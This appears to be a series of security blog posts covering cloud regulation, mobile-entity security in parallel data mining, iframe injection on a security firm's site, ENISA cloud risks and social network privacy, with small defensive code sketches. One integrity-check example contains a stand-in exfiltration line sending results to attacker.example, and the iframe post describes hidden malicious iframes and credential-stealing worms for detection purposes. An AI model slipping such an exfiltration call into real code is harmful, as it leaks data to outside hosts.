TRAI’s initiative towards a ‘Regulation on Cloud for Industry’..

Keeping this post short and crisp, in line with the tone readers expect on this blog, I would simply like to report that the conference with TRAI (Government of India) on a ‘Regulatory Framework on Cloud for Indian Industry’ was a grand success, and TRAI’s vision of achieving this giant leap in the form of a baseline national regulation for cloud providers and subscribers is worth commending. I was one of the 21 consultants on this national regulatory initiative, representing whitehat’People’ – the open security consortium, for Cloud Security and Governance.

Our focus was on the cloud security modules of the regulation, so we discussed viewing the cloud as a security model, identified the security issues and impact of adopting and using the cloud, and proposed measures to counter them. We also provided a cloud security framework, drafted and designed to support thorough assessment and audit. With respect to the specified ‘two-layer control’ approach, the three-phase framework constituted: framework governance and workflow, a niche of security controls (Controls I), and our mechanism of sub-phases for integrating penetration vectors into material audit considerations (Controls II), along with a protection approach.

More precisely, keeping the security facets of the cloud in view, we helped form a plan that helps decide (a small illustrative sketch follows the list):

  • What needs to be running
  • What can be temporarily disrupted
  • What should be deliberately disconnected
  • What additional security measures should be enabled
  • How to communicate all of the above across the varied structures of the cloud
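
As a purely illustrative sketch (not part of the TRAI framework text; the service names and categories below are hypothetical), such a plan can be captured as a simple per-service classification:

```python
# Hypothetical sketch of the decision plan above, expressed as a per-service
# classification a cloud subscriber could maintain; categories mirror the
# bullet points and are not drawn from any regulatory text.
SERVICE_PLAN = {
    "billing-api":   {"status": "must-run",    "extra_controls": ["mfa", "audit-logging"]},
    "report-engine": {"status": "may-disrupt", "extra_controls": ["audit-logging"]},
    "legacy-ftp":    {"status": "disconnect",  "extra_controls": []},
}


def services_with_status(status: str) -> list[str]:
    """List the services that fall into a given category of the plan."""
    return [name for name, plan in SERVICE_PLAN.items() if plan["status"] == status]


if __name__ == "__main__":
    print(services_with_status("must-run"))  # ['billing-api']
```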
The conference also included discussions on other aspects of the cloud, including interoperability, legal concerns, quality of service, etc. TRAI expects the regulation to come into force within 6-8 months, and will shortly be out with draft consultation papers addressing the concerns of both providers and subscribers availing cloud services.
//Abhiraj

‘Parallelized’ Data Mining (PDM) Security..

Parallel Data Mining is currently attracting much research. The objects involved in ‘Parallel Data Mining’ include a special type of entity with the ability to migrate from one processor to another, where it can resume or initiate its execution. In this article we consider security issues that need to be addressed before these systems in general, and ‘parallelized systems’ in particular, can be a viable solution for a broad range of commercial tools.

In this section we briefly describe some properties of these systems, particularly parallelized systems. This is not intended to be a complete description of ‘anything and everything’ of the topics mentioned above; we focus on issues with possible security implications.

When we speak of ‘entities’ here, we mean an ‘object / process / matter / material / data stream’ that exhibits some kind of independent, self-contained ‘intelligence’. We can therefore say that “an entity is often assumed to represent another entity, such as an integrated output of a classified cluster or some other organization or environment on whose behalf it is acting”. No single universal definition of an entity exists, but there are certain widely agreed characteristics; these include a fluctuating ambiance/environment, autonomy, and elasticity.

  • Fluctuating Ambiance means that the entity receives sensory input from its environment and that it can perform actions which change the environment in some way.
  • Autonomy means that an entity is able to act without the direct intervention of other entities (or other objects), and that it has control over its own actions and internal state.
  • Elasticity can be defined to include the following properties:
    • Responsive: refers to an entity’s ability to perceive its environment and respond in a timely fashion to changes that occur in it;
    • Pro-active: entities are able to exhibit opportunistic, goal-driven behavior and take the initiative where appropriate;
    • Social: entities should be able to interact, when appropriate, with other entities and humans in order to solve their own problems (such as distributing instructions to various sections, or assigning instructions to the respective processors with respect to certain considerations) and to help other entities with their activities.

A number of other attributes are sometimes discussed in the context of ‘Augur’. These include but are not limited to:

  • Rationality: The assumption that an event will not act in a manner that prevents it from accomplishing its goals and will always attempt to fulfill those goals.
  • Candor: The concept that an event will not ‘knowingly’ communicate false information.
  • Cordiality: An entity cannot have conflicting goals that either force it to transmit false information or to effect actions that cause its goals to be unfulfilled or impeded.
  • Mobility: The ability of an entity to move across networks and between different hosts to fulfill its goals.

Platforms, or the desired infrastructure, provide entities with environments in which they can execute. A platform typically also provides additional services, such as communication facilities, to the entities it is hosting. In order for entities to be able to form a useful parallel system where they can communicate and cooperate, certain functionality needs to be provided to them. This includes functionality to find other entities or to find particular services. It can be implemented as services offered by other processes or as services more integrated with the infrastructure itself. Examples of such services include facilitators, mediators, and matchmakers.
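
As a rough illustration of the kind of matchmaking functionality such a platform might expose, here is a minimal sketch; the class and method names are hypothetical and not taken from any particular framework:

```python
# Minimal sketch of a platform-side "matchmaker" service: entities register
# the services they offer, and other entities query the registry to find them.
from collections import defaultdict


class Matchmaker:
    def __init__(self):
        # service name -> set of entity identifiers offering that service
        self._registry = defaultdict(set)

    def register(self, entity_id: str, service: str) -> None:
        """An entity advertises a service it can provide."""
        self._registry[service].add(entity_id)

    def deregister(self, entity_id: str, service: str) -> None:
        self._registry[service].discard(entity_id)

    def find(self, service: str) -> list[str]:
        """Return the entities currently offering a given service."""
        return sorted(self._registry[service])


if __name__ == "__main__":
    mm = Matchmaker()
    mm.register("miner-17", "cluster-classification")
    mm.register("miner-42", "cluster-classification")
    print(mm.find("cluster-classification"))  # ['miner-17', 'miner-42']
```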

Security Issues with Parallel Data Mining

In this section we discuss security issues based on the characteristics described above:

1) Entity Execution: Naturally, entities need to execute somewhere. A host, the immediate environment of an entity, is ultimately accountable for the accurate execution and protection of the entity. This leads straight to the question of where access control decisions should be performed and enforced. Does the entity contain all the necessary logic and information required to decide if an incoming request is authentic (originating from its claimant) and, if so, whether it is authorized (has the right to access the requested information or service)? Or can the entity rely on the platform for access control services? The environment might also need protection from the objects that it hosts. An entity should, for example, be prevented from launching a denial-of-service attack by consuming all resources on a processor, thus preventing the host from carrying out other tasks (such as executing other scheduled entities).
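
A minimal sketch of the platform-side variant of this decision, assuming the platform rather than the entity holds the policy (the policy format, the quota and all names are hypothetical):

```python
# Sketch of platform-enforced access control plus a simple per-entity resource
# quota, illustrating the two concerns above: deciding whether an authenticated
# caller is authorized, and preventing a hosted entity from exhausting the host.

POLICY = {
    # (caller, resource) -> allowed operations
    ("miner-17", "dataset/sales"): {"read"},
    ("miner-42", "dataset/sales"): {"read", "write"},
}

QUOTA_CPU_SECONDS = 30  # upper bound the host grants any single entity


def is_authorized(caller: str, resource: str, operation: str) -> bool:
    """Platform-side check: may this (already authenticated) caller perform
    the requested operation on the resource?"""
    return operation in POLICY.get((caller, resource), set())


def within_quota(cpu_seconds_used: float) -> bool:
    """Crude resource check so one entity cannot starve the host."""
    return cpu_seconds_used <= QUOTA_CPU_SECONDS


if __name__ == "__main__":
    print(is_authorized("miner-17", "dataset/sales", "write"))  # False
    print(within_quota(12.5))                                   # True
```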

2) Fluctuating Ambiance: What the term ‘environment’ denotes depends entirely on the application and appears almost arbitrary in the literature; it can, for example, be the ‘International Network’, viz. the Internet, or the host on which the entity is executing. An entity is assumed to be ‘conscious’ of certain states or events in its environment. Depending on the nature and origin of this information, its authenticity and availability need to be considered. If an entity’s ‘environment’ is limited to the processor on which it is executing, no specific security measures might be necessary (assuming the host environment is difficult to spoof, keeping in mind the ‘objective proportional to time’ ratio). The situation is, however, likely to be totally different if the entity receives environment information from, or via, the Internet.

3) Autonomy: This property, when combined with other features given to entities, can introduce serious security concerns. If an entity, for example, is given authority to perform an objective, it should not be possible for another party to force it into committing to something it would not normally commit to. Neither should an entity be able to make commitments it cannot fulfill. Hence, issues around delegation need to be considered for ‘entities ➨ events’ / instructions. The autonomy property does not necessarily introduce any ‘new’ security concerns; it is held by many existing systems. It is worth mentioning that worms and viruses also hold this property, which enables them to spread efficiently without requiring any (intentional or unintentional) interaction with other objects. The lesson is that powerful features can also be ‘remixed’ and used for malicious purposes if not properly controlled.

4) Communication Botheration: Of the ‘elasticity’ properties, social behavior is certainly the most interesting from a security point of view. It means that entities can communicate with other entities. Just as an entity’s communication with its surroundings / environment needs to be protected, so does its communication with other entities. The following security properties should be provided (a minimal signing sketch follows the list):

  • Confidentiality: Affirmation that communicated / proclaimed information is not accessible to unauthorized parties;
  • Data integrity: Affirmation that communicated / proclaimed information cannot be altered / shaped / manipulated by unauthorized parties without being detected;
  • Authentication of origin: Affirmation that communication is originating from its claimant;
  • Availability: Affirmation that communication reaches its intended recipient in a timely fashion (‘secure negotiation’ protocols play a huge role here);
  • Non-repudiation: Affirmation that the originating entity can be held responsible for its communications.
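
A minimal sketch of origin authentication and data integrity for entity-to-entity messages, assuming a pre-shared key (all names are hypothetical; confidentiality would additionally require encryption, and non-repudiation would require asymmetric signatures rather than a shared-key MAC):

```python
# HMAC over a shared secret gives integrity and origin authentication for
# messages exchanged between entities. Key distribution is assumed to happen
# out of band and is not shown here.
import hashlib
import hmac

SHARED_KEY = b"example-key-distributed-out-of-band"


def sign(message: bytes) -> str:
    return hmac.new(SHARED_KEY, message, hashlib.sha256).hexdigest()


def verify(message: bytes, tag: str) -> bool:
    return hmac.compare_digest(sign(message), tag)


if __name__ == "__main__":
    msg = b"assign partition 3 to miner-42"
    tag = sign(msg)
    print(verify(msg, tag))                         # True: intact, from a key holder
    print(verify(b"assign partition 3 to x", tag))  # False: tampered in transit
```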

It’s a fact that “security usually comes at a cost”. Additional computing and communication resources are required by most solutions to the security functionality mentioned above, so security needs to be dynamic. Often it makes sense to protect all communication within a system to the same level, as the actual negotiation of security mechanisms ‘may’ then be avoided. However, in a large-scale parallelized data mining system, security services and mechanisms need to be adjusted or tweaked to the purpose and nature of the communications of various applications with varying security requirements. Some implementations of architectures in this niche assume that security can be provided transparently by a lower layer, i.e. added to data sections while distributing them to the various problems. This approach might be sufficient in closed, or more precisely localized, systems where the entities can trust each other and the sole concern is external malicious parties.

5) Maneuverability: The use of movable or mobile entities raises a number of security concerns. Entities need protection from other entities and from the hosts on which they execute. Similarly, hosts need to be protected from entities and from other objects / parties (tools getting co-mingled with processes through various forms of injection and other vulnerable loopholes) that can communicate with the platform. The problems associated with protecting hosts from malicious code are reasonably well understood. The problem posed by malicious hosts to entities and the environment seems more complex to solve: since an entity is under the control of the executing host, the host can in principle do anything to the entity and its code.

The particular attacks that a malicious host can mount can be summarized as follows (a minimal integrity-check sketch follows the list):

  • Observation of code, data and flow control.
  • Manipulation of code, data and flow control – including manipulating the route of an entity
  • Incorrect execution of code
  • Denial of execution – either in part of an event or whole
  • Masquerading as a different host
  • Eavesdropping and Manipulating other event communications
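
The integrity-check sketch referred to above: a hedged illustration of how an originator might detect (though not prevent) manipulation of an entity’s code or collected data by a host it visited; the names and payloads are hypothetical:

```python
# The originator records a hash of the entity's payload before dispatch and
# re-checks it when the entity returns. This detects tampering after the fact;
# it cannot prevent a malicious host from reading or misexecuting the entity.
import hashlib


def fingerprint(payload: bytes) -> str:
    return hashlib.sha256(payload).hexdigest()


def unchanged(payload: bytes, expected_fingerprint: str) -> bool:
    return fingerprint(payload) == expected_fingerprint


if __name__ == "__main__":
    code = b"def mine(partition): ..."
    before = fingerprint(code)
    # ... the entity migrates to a remote host and comes back ...
    tampered = code + b"\nsend_results_to('attacker.example')"
    print(unchanged(code, before))      # True
    print(unchanged(tampered, before))  # False
```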

6) Rationality, Candor, and Cordiality: From a security point of view, the meaning of these properties seems to be: “events are well behaved and will never act in a malicious manner.” If we make this a bona fide requirement, the redundancy required for such a system is likely to make the system useless. Affirmation that only information from trusted sources is acted upon, and that events (or their initiators) can be held responsible for their actions, together with monitoring and logging of event behavior, are mechanisms that can help in drafting a system where the implications of malicious events / entities are minimized.

7) Identification and authentication: Identification is not primarily a security issue in itself; however, the means by which an entity is identified are likely to affect the way it can be authenticated, i.e. if the labeling environment of an event gets knocked out or goes uncontrolled, further actions would suffer the same fate. For example, an entity could simply be identified by something like a serial number, or its identity could be associated with its origin, owner, capabilities, or privileges. If identities are not permanent, security-related decisions cannot (or more precisely should not) be made on the basis of an entity’s identity. While an entity’s identity is of major importance to certain applications and services, it is not needed in others. In fact, entities are likely to be ideal for providing anonymity to their initiators, as they are independent pieces of code possessing some degree of autonomy and do not require direct third-party interaction.
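
As an illustration of an identity “associated with its origin, owner, capabilities, or privileges”, one simple hypothetical construction derives the identifier from those attributes together with a hash of the entity’s code:

```python
# Hypothetical sketch: derive a stable entity identifier from its owner,
# origin platform and code hash, so the identity carries its provenance.
# A real system would additionally bind this to a signature or certificate.
import hashlib


def entity_id(owner: str, origin_host: str, code: bytes) -> str:
    material = f"{owner}|{origin_host}|{hashlib.sha256(code).hexdigest()}"
    return hashlib.sha256(material.encode()).hexdigest()[:16]


if __name__ == "__main__":
    print(entity_id("analytics-team", "node-03.example", b"def mine(p): ..."))
```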

This article can also be viewed here.

//Abhiraj

Interview with global Hackerspaces Project!

Recently I had an interview with the international hackerspaces project, on the ‘Talking Anthropology’ show on Hackerspace Signal, covering a varied spectrum of subjects including the Indian hackerspace, standards-related issues in India, the Blackberry case scenarios, and varied InfoSec topics such as electronic voting machines, biometrics and cyber warfare!

The focus of the interview lies basically in the situation of India concerning hackerspaces and related subjects. What is interesting for a wider public around the world are the efforts of the Indian government towards biometric recognition of citizens, electronic voting, the Indian tech industry in comparison, connections to national and international hacker conferences, the state of the Indian hacker scene, the relationship between the hacker scene and society, net neutrality in India, examples of hacktivism (perhaps nationalism-motivated attacks against Pakistan) … all of which I got hands-on with during the interview on the Signal!

A detailed post on the interview topics, written up in much more detail for a wider audience, will follow as soon as I get out of my hectic schedule. Till then, let me know which topics you would like me to discuss in detail!

The detailed interview can be heard, or downloaded, from the hackerspaces archive at http://signal.hackerspaces.org/archive/. An update on this can also be found on the hackerspaces blog at http://blog.hackerspaces.org/. The schedule of the broadcast can be seen at http://hackerspaces.org/wiki/Signal/Schedule.
TA16 – Indian Hackers [62:50m]

//Abhiraj

LIGATT site vulnerable to a basic injection technique!

It came as an utter surprise to me when I saw LIGATT Security International’s site suffering from one of the most basic flaws, one that allows any object to be embedded into their portal. Frankly, it does not look ‘that good’ to see a security firm of such reputation still carrying a basic flaw in their website.

The Flaw: ‘iFrame injection’

Iframe injection is the injection of one or more iframe tags into a page’s content. The iframe can typically do many not-so-good things, such as downloading an executable application that may contain malware and directly compromise a visitor’s system.

It is now one of the popular methods of loading malware onto users’ PCs without them knowingly visiting a malicious website. An iframe (short for “inline frame”) is just a way of loading one web page inside another, commonly from a different server. That is one of those things which can be useful for building online applications. But malware writers can make the included page just ‘one pixel square’ – meaning you can’t even see that it’s there – and obfuscate the JavaScript that will run automatically from that included page so that it looks something like %6D%20%6C%72%61%6D%65%62%6F – leaving no obvious clue that it’s malicious.

Ways worms inject hidden iframes into files

  • The server getting compromised: This is one of the most common ways. Some of the websites residing on the same web server as your website may be compromised (or a vulnerability in one’s own web application may be what caused the web server to get compromised). Once the server is compromised, the worm automatically spreads itself to the rest of the websites on the server.
  • Compromise through client-side FTP: The worm may be residing on any of the client computers one uses for accessing the FTP / control panel accounts of the hosting server. When you type in the credentials for the control panel, the worm silently reads them, accesses the portal and starts infecting the files found on the server, adding a snippet of injected code to all the index.* files – one variant for the HTML pages and another for the PHP pages.

Detecting iFrame Injections

To detect iframe injections, one should look through the HTML that your web server is sending. Open a page in your browser and then look for iframe tags. Injections usually insert iframes that point to raw IP addresses (something like “64.76.7.101”) instead of domain names; treat these as suspicious. Once you’ve found an iframe and have determined that it’s not legitimate, you have to remove it from the page or database it’s coming from. On a WordPress blog you simply edit the page in question, look for the “<iframe>” tag and remove it.
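
A small way to automate the manual check above is a plain scan for iframe tags whose src points at a raw IP address; it is only a heuristic and will not catch obfuscated or script-generated injections (the URL and names below are placeholders):

```python
# Rough scanner for the symptom described above: <iframe> tags whose src
# points at a raw IP address rather than a domain name.
import re
import sys
import urllib.request

IFRAME_RE = re.compile(
    r"""<iframe[^>]+src=["']?(https?://\d{1,3}(?:\.\d{1,3}){3}[^"'>\s]*)""",
    re.IGNORECASE,
)


def suspicious_iframes(html: str) -> list[str]:
    """Return iframe src values that point at raw IP addresses."""
    return IFRAME_RE.findall(html)


if __name__ == "__main__":
    url = sys.argv[1] if len(sys.argv) > 1 else "http://example.com/"
    html = urllib.request.urlopen(url).read().decode("utf-8", errors="replace")
    for src in suspicious_iframes(html):
        print("suspicious iframe:", src)
```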

Anyhow, I hope that LIGATT rectifies these kinds of basic flaws in their portal, thereby upholding its reputation.

This post can also be viewed here.

//Abhiraj

ENISA’s Risk Summary Of Cloud Computing

The ENISA report on cloud security identified a number of areas where risk elements were present: it acknowledged 8 high-risk items and 29 medium-risk items across the areas of Policy & Organizational Risks, Technical Risks, Legal Risks, and Risks Not Specific to the Cloud. In summary, the identified elements labeled as *key risks* are briefed below:

1) Loss of Governance: In using cloud infrastructure, the client necessarily cedes control to the cloud provider on a number of issues which may affect security. At the same time, the service level agreement may not offer a commitment to provide such services on the part of the cloud provider, thus leaving a gap in the security defenses. Lack of governance is the key issue here.

Vulnerabilities:

  • V34: Unclear Roles and Responsibilities.
  • V35: Poor enforcement of role definitions.
  • V21: Synchronizing responsibilities or contractual obligations to different stakeholders
  • V23: SLA clauses with conflicting promises to different stakeholders
  • V25: Audit or certification not available to consumers
  • V18: Lack of standard technologies and solutions
  • V22: Cross cloud applications creating hidden dependency
  • V29: Storage of data in multiple jurisdictions and lack of transparency about this
  • V14: No source escrow agreement
  • V16: No control on vulnerability assessment process
  • V26: Certification schemes not adapted to cloud infrastructures
  • V30: Lack of information on jurisdictions
  • V31: Lack of completeness and transparency in terms of use
  • V44: Unclear assets ownership

Affected Assets:

  • A1: Company reputation
  • A2: Customer trust
  • A3: Employee loyalty and experience
  • A5: Personal sensitive data
  • A6: Personal Data
  • A7: Personal Data: Critical
  • A9: Service delivery- real time services
  • A10: Service delivery

2) Lock-in Situation: The ‘lock-in situation’ has also been considered. There is currently little on offer in the way of tools, procedures, standard data formats or ‘as a service’ interfaces that could guarantee data, application and service portability.
This can make it difficult for customers to migrate from one provider to another, or to migrate data and services back to an in-house IT environment. It introduces a dependency on a particular cloud provider for service provision, especially if data portability, the most fundamental aspect, is not enabled.

3) Isolation Failure: Multi-tenancy and shared resources are defining characteristics of cloud computing. This risk category covers the failure of mechanisms separating storage, memory, routing and reputation between different tenants. However, it should be considered that attacks on resource-isolation mechanisms are still rarer and much more difficult for attackers to put into practice compared to attacks on traditional operating systems.

4) Compliance Risks: Of course, one of the key areas is compliance risk. Investment in achieving certification may be put at risk by migrating to the cloud if the cloud provider cannot provide evidence of its own compliance with the relevant requirements, or if the cloud provider does not permit audits by the cloud customer. In certain cases it also means that using a public cloud infrastructure implies that certain kinds of compliance cannot be achieved (for example, PCI).

Vulnerabilities:

  • V25: Audit or certification not available to consumers
  • V13: Lack of standard technologies and solutions
  • V29: Storage of data in multiple jurisdictions and lack of transparency about this
  • V26: Certification schemes not adapted to cloud infrastructures
  • V30: Lack of information on jurisdictions
  • V31: Lack of completeness and transparency in terms of use

Affected Assets:

  • A20: Certification

5) Management Interface Compromise: Management interface compromise (MIC) may also be an issue: the customer management interfaces of a public cloud provider give programmatic access to a larger set of resources and therefore pose an increased risk, especially when combined with remote access and web browser vulnerabilities.

6 & 7) Data Protection & Insecure or Incomplete Data Deletion: Cloud computing of course poses several data protection risks for cloud providers and customers. In some cases it may be difficult for the cloud customer to obtain the ‘correct level’ of data protection at all; for example, if you leave a cloud provider it must be guaranteed that your data is completely deleted. When a request to delete cloud resources is made, the underlying system may not actually wipe the data. Adequate or timely data deletion may even be impossible, either because extra copies of the data are kept (for example for restore purposes) or because they are unavailable for wiping.

Vulnerabilities:

  • V30: Lack of information on jurisdiction
  • V29: Storage of data in multiple jurisdictions and lack of transparency about this

Affected Assets:

  • A1: Company reputation
  • A2: Customer trust
  • A5: Personal sensitive data
  • A6: Personal Data
  • A7: Personal Data: Critical
  • A9: Service delivery- real time services
  • A10: Service delivery

8) Malicious Insider: Another risk that stood out was the malicious insider; while less likely, the damage that may be caused by a malicious insider is often far greater. Cloud architectures necessitate certain roles that carry extremely high risk, for example the cloud provider’s system administrators and managed security service providers.

This post can also be viewed here.

//Abhiraj

Cloud Computing – It’s not ‘WHAT’ but ‘HOW’ we do things…

The concept of the cloud is certainly one of those things that gets a lot of hype, but no matter how one looks at it, the fact remains that it is being used in greater and greater numbers and is becoming a more important topic for people to understand; with that, the security aspect of it also plays an important role. What it means and how people should deal with it is a topic that has been widely discussed, yet it is still confusing for some and there is a lot of uncertainty in this space.

The industry spent a few months wrestling over exactly how to describe this ‘thing’ in a distinct way, especially to those who have not been thinking about it. The definitions that exist are many and varied, yet one way to look at it is: “Cloud computing is not necessarily about ‘what’, it’s more about ‘how we do things’”. There is no need for new technology when it comes to cloud computing, as essentially most of it is existing technology just ‘re-mixed’; the real change is in how consumers acquire that technology, how it is provisioned internally, how it is used, and whether or not the consumer actually owns the computing technology they are accessing. A great deal of what the cloud is was really signaled and opened up, from a market perspective, by virtualization and the concept of abstracting applications from the physical infrastructure, which really helped enterprises (as well as a bunch of vendors, to be fair) understand and open their eyes to what the cloud can do. So VMware clearly had an impact on the market, and from another angle the internet services coming from the consumer world have also signaled the new model of computing: Google clearly got the market’s attention by demonstrating what you can do with a scalable, highly efficient infrastructure used to serve any and all of your applications over the wire.
So, to sum it up: there is not much that is truly new here. There are some new technologies, especially around the provisioning, scaling and metering aspects of computing, but the reality is that we are changing a lot of ‘how people use computing’, and that is a great way to think about cloud computing.

Another way to view the cloud is to think of it as a spectrum. Many people ask how to define ‘Infrastructure as a Service’ (IaaS), ‘Platform as a Service’ (PaaS) and ‘Software as a Service’ (SaaS), and today there are just too many ‘as a service’ acronyms, one of them being ‘XaaS’, which indicates ‘everything as a service’. The best way to think about these things, or to identify what you are dealing with and which bucket it fits into, is to look at which layer of the computing stack is being abstracted. The infrastructure players (i.e. Infrastructure as a Service) really focus on core computing infrastructure-level technologies. Looking at Amazon’s AWS, EC2 and S3, they are taking a server and turning it into an abstracted entity that you can access over the wire, along with the disk drives; they are going squarely after the compute layer, and there are companies like ‘Gogrid’ doing the same thing within the Microsoft framework. We can see many other firms coming up in this category, such as Linode, Rackspace etc. When we move up to ‘Platform as a Service’, one is really making a decision about the application framework one is looking at, and people need to understand that when they approach ‘Platform as a Service’ they are making a very strategic decision about how they are going to architect whatever application they are going to run; if they choose to go with ‘Force.com’ or ‘Azure’ or ‘AppEngine’ or an ‘Engine Yard’, they are effectively getting married to that platform. So, in a way, we could call ‘Platform as a Service’ one of the most interesting areas of the cloud computing market. The last area, ‘Software as a Service’, clearly shows what these players bring in: that layer of business logic on top of the application framework that really drives business value. It is where the translation of computing into value for the business occurs, and that is why tremendous action is seen in this marketplace. Moreover, if one looks at the startups as well as some established players, the growth of this marketplace is pretty significant.

# This published post can also be viewed here.
[+] This post is a part of my ongoing research paper on ‘Cloud Computing: Privacy & Security’.

//Abhiraj

Social Networking: Privacy and Security…

According to reports in daily journals and magazines, a number of US privacy and consumer protection groups filed a complaint with the US Federal Trade Commission (FTC) accusing Facebook of “unfair and deceptive” practices. They also called on the FTC to investigate Facebook’s privacy practices further and to force it to take steps to guard better against security breaches.

On top of this, I get multiple queries daily on ‘accounts getting hacked’, ‘identity theft’ and ‘hoaxes aka spam spreading’ through social networking portals. The one thing I would like to say, both as a security consultant and as a well-versed Web 2/3.0 user, is: *you can never get hacked by anyone until you let it happen*. The techniques perpetrators use to get into your account rely on the captivating content you yourself publish online, plus a bit of ‘social engineering tactics’, which informally means “engaging a user under a fake identity to gain the user’s ‘trust’ and thereafter extracting valuable information through continuous interaction”.

In response to the complaints by the various consumer protection groups, the social networking company has added several new security tools to help prevent hacking and has increased its privacy options. Yet, no matter what the FTC finds or what the social networking firms add, a far better approach to ‘user security and privacy’ would be to ensure that users are aware of social networking risks and accountable for the types of information they willingly share.

Some general best practices, coupled with a little common sense, that users should be aware of include:

  • Keep your ‘personal information’ to yourself: Never post your full name, social security number, address, phone number, or other credentials tied to your accounts or other personal assets. Be cautious about posting information that could be used to identify you offline (school, college, workplace etc.).
  • Post only information that you are comfortable with others seeing and knowing about you. Keep in mind that many people beyond your accepted friends can see your page.
  • Remember that once you post information online, you can’t take it back. Even if you delete it from a site, older versions persist on other machines and in caches.
  • Read the privacy guide of the social networking portal. At the bottom of every page there is usually a link for “Privacy”; that page contains the latest privacy features and policies set up by the firm, which helps you verify your privacy settings.
  • Choose your ‘Friends’ carefully. Once you have accepted someone as your friend, they will have access to any information about you (including photographs) ‘that you have marked as viewable by your friends’.

Organizations, corporations and institutions should also find better ways to provide ongoing safety awareness, so that people understand the escalating risks and threats lurking online if they willingly share too much credential information that may attract intruders.

Individual users need to be more accountable for securing their sensitive and personal credentials. Is it a ‘networking portal’s’ responsibility, if users decide to post their ‘valuable credentials’ or share their credit card number online?

#This published post can also be viewed here.

//Abhiraj